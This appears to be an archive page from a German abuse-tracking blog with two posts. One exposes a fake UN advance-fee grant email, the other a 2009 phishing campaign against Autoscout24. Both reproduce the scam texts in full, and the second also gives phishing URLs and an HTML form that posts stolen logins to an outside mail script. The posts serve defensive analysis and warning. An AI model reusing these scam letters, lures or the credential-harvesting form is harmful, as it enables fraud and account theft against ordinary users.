Archive for the 'Uncategorized' Category

Post von Mr Ban Ki-moon

Published on July 21, 2009 in Uncategorized. 1 Comment Tags: , , , , .

Heute Morgen schaute ich nicht schlecht, als ich ein Email vom Generalsekretär der Vereinten Nationen, Mr Ban Ki-moon, erhalten habe. Das Email wurde über mein Kontakt-Formular auf abuse.ch an mein Postfach gesendet:

Betreff: United Nations Trust Fund [info@uno.org]

United Nations Trust Fund
Switzerland Department of Humanitarian Affairs Palais des Nations CH-1211 Geneva 10 Switzerland.

Congratulations Beneficiary, Your email has been selected by the United
Nations(UN) for a cash grant award of Six Hundred And Fifty Thousand Five hundred United States Dollars,($650,500.00usd)for this year 2009 Grant Award.Your email address was selected during our random email balloting for the cash grant and if you received this notification,it means that you are a lucky beneficiary of ourcash grant award.

The united nations authorities has decided to give this award to 15 beneficiaries from all over the world to help fascilitate and improve the standard of living to the Commission,on the Limits of the strong Continental Shelf for developing States, in particular the least developed countries and small island developing States,and compliance with article
76 of the United Nations Convention on the Law of the Sea.

This grant is been aided by the United Nations development programme and the united nations trust funds for human security.Your cash grant pin number is(UNO-154/4456/011) You are kindly obliged to contact our corresponding UN Payment office (United Nations Trust Funds ) in United Kingdom and they will give details on how your funds would be remitted to you.Do contact our payment office immediately with the informations below.Your grant numbers fall within your Location file, you are requested to contact the event manager/Claims Department, send your winning identification numbers and fill the verification form below,to enable him verify your claims.

1.FULL NAMES OF DONATION BENEFICIARY:………………
2.RESIDENTIAL ADDRESS:…..
3.DATE AND PLACE OF BIRTH:……………
4.WINNING EMAIL:………………………………………..
5.PHONE/FAX NUMBERS:……………………………..
6.NAME AND ADDRESS OF NEXT OF KIN:………………..
7.SEX:…………………………………………
8.OCCUPATION:……………………………………
9.MARITAL STATUS:………………………………..
10.COUNTRY:……………………………………..
11NATIONALITY:…………………………………..

Do contact our payment office immediately with the informations below.
*************************************************
Payment Officer: Dr.Packer Estrada
Phone Number: + 447 0240 70124
Email: un.trustfund09@yahoo.com.hk
*************************************************

Regards,
Mr Ban Ki-moon.
UNITED NATIONS SECRETARY GENERAL.

Auf den ersten Blick sieht das Email vertrauenswürdig aus: Im Email wird der Name sowie die Adresse des Schweizer “Department of Humanitarian Affairs” genannt:

Switzerland Department of Humanitarian Affairs Palais des Nations CH-1211 Geneva 10 Switzerland.

Tatsächlich hat die UN ein Office an der genannten Adresse: United Nations offices > Switzerland.

Der tatsächliche Absender des Emails versucht den Empfänger davon zu überzeugen, dass diesem durch den United Nations Trust Funds rund 650’500 US Dollar zugute kämen. Tatsächlich gibt es auch einen United Nations Trust Fund for Human Security (link). Des Weiteren ist im Email von einer cash grant pin number (UNO-154/4456/011) die rede.

Leider ist das ganze zu schön um wahr zu sein. Spätestens beim zweiten mal durchlesen der Email sollte der normale Menschenverstand eingreifen: Das ganze ist ein Fake. Die Email Adresse des genannten Payment Officers ist nicht etwa eine Email Adresse mit der Endung un.org sondern vielmehr eine Email Adresse zu einem Yahoo Postfach in HongKong (yahoo.com.hk). Der Empfänger wird aufgefordert, einige persönliche Informationen an einen Payment Officer, in unserem Fall Dr.Packer Estrada, zusenden. Antwortet der Empfänger der Email, wird er dazu aufgefordert, als erstes einen Geldbetrag an ein Ausländisches Konto zu überweisen, um irgendwelche Bearbeitung gebühren zu begleichen. Tut er dies, hört er weder was von dem Absender der Email noch von dem versprochenen Geld.

Fazit

Die Masche ist nicht neu und nennt sich “Vorschussbetrug”. Laut Fraudwatchers.org sind solche Emails bereits seit September 2008 im Umlauf. Sie erinnert an die Nigeria Scam Mails (Nigeria Connection).

Wie immer ist es ratsam, bei verdächtigen Emails die Vernunft walten zu lassen und auf keinen Fall irgendeinen Geldbetrag zu überweisen geschweige denn irgendwelche persönlichen Informationen preis zu geben. Empfänger solcher Emails verwenden am besten einfach gleich die DELETE-Taste.

Weiterführend Links

  • wikipedia.org: Vorschussbetrug
  • Fraudwatchers.org: Ban Ki-moon/Dr.Packer Estrada/UN Cash Grant 2008
  • 419Baiter.com: >United Nations Trust Funds Department of Humanitarian Affairs Switzerland

    • Phishing Attacke gegen Autoscout24

    Published on February 24, 2009 in Uncategorized. 5 Comments Tags: , , , , , , , .

    Seite heute Morgen kurz nach 06:00 Uhr scheint eine gezielte phishing Attacke gegen autoscout24 im Gange zu sein. Das Phishing-Mail täuscht vor, vom Absender info@autoscout24.ch zu stammen. Der Absender ist in Wahrheit jedoch gefälscht:

    Von: info@autoscout24.ch
    Betreff: Verkaeufer Informationen Haben Erfordert

    Aufmerksamkeit!

    Liebes Mitglied Autoscout24,

    Wir haben kurzlich bemerkt, dass eine oder mehr Versuche in zu Ihrem autoscout24 Konto von einem auslandischen IP Adresse loggen..

    Wenn Sie kurzlich auf Ihr Konto zugegriffen haben, wahrend Reisen, durfte der ungewohnliche Klotz in Versuchen von Ihnen eingeleitet worden sein. Jedoch, wenn Sie den Klotz in nicht eingeleitet haben, bitte Besuch autoscout24 sobald moglich, Ihre Identitat zu beglaubigen:

    http://autoscout24-reg.info/home/index/login.asp/verify.html

    Beglaubigt, dass Ihre Identitat ein Sicherheitsma©¬ ist, das sichern wird, dass Sie die einzige Person mit Zugriff auf das Konto sind.

    Dank fur Ihre Geduld, als wir zusammenarbeiten, Ihr Konto zu schutzen.

    Fur mehr Informationen sieht bitte den Verbindungsblasebalg:

    http://about.autoscout24.com/de-de/au-company/au-company-agb/au-company-agb-as24.aspx

    Mit freundlichen Grussen,

    AutoScout24 Team,
    AutoScout24 GmbH
    Rosenheimer Str. 143 b
    81671 Munchen

    Das Phishing-Mail ist in schlechtem deutsch verfasst und versucht den Empfänger auf eine Phishing-Seite zu locken:

    autoscout24_phishing

    Die Phishing Webseite autoscout24-reg.info (83.170.121.1) wird bei einem Provider in Grossbritannien gehostet:

    inetnum: 83.170.120.0 – 83.170.123.255
    netname: UK2-NET
    descr: UK2.net
    remarks: Abuse matters to: abuse@uk2.net
    remarks: Abuse mail to any other address may be ignored
    country: GB

    Gibt das Opfer seine Autoscout24 Login Informationen ein, werde diese an den Urheber der Phishing-Mails gesendet. Interessant ist in diesem Fall der HTML-Quellcode der Phishing-Webseite, dort findet man nämlich die E-Mail Adresse, an welche die gephishten Login Informationen gehen:

    <\FORM style="MARGIN: 0px" name=SignInForm
    onsubmit=setOptimCookie();readFlash();
    action=http://www.step-sa.fr/cgi-bin/mailform.cgi method=post
    ?><\INPUT type=hidden value=username,password,email,email_p
    name=data_order> <\INPUT type=hidden
    value=fameia_bionica@yahoo.com name=submit_to> <\INPUT type=hidden
    value=http://magazin.autoscout24.de/container/container-2/cookies_ab_ie6.asp
    name=ok_url>

    Mit einem Klick auf den Button “Anmelden” werden die angegebenen Login-Daten über ein CGI-Script auf www.step-sa.fr per E-Mail an eine Yahoo E-Mail Adresse gesandt:

    fameia_bionica@yahoo.com

    Fazit
    Den Empfänger solcher Phishing-Mails wird dringen davon abgeraten, auf den im Phishing-Mail angegebenen Link zu klicken sowie auf keinen Fall seine Login-Daten bekannt zu geben.

    UPDATE 19. März 2009

    Seit heute Morgen ist erneut eine Phishing-Welle gegen Autoscout24 am rollen. Absender, E-Mail Betreff und E-Mail Text sind die selben wie bei der letzte Phishing-Welle. Die angepriesene URL ist jedoch eine andere (autoscot24-ch.info):

    http://autoscot24-ch.info/home/index/login.asp/verify.html

    Die Webseite wird diesmal auf einem Server in den USA betrieben:

    Domain: autoscot24-ch.info
    IP address: 216.10.249.21

    NetRange: 216.10.240.0 – 216.10.255.255
    OrgName: Webhost4life.com
    OrgID: UMA-9
    Address: 1055 Corporate Center Drive Suite 210
    City: Monterey Park
    StateProv: CA
    PostalCode: 91754
    Country: US
    economics-recluse
    Scene
    Urgent!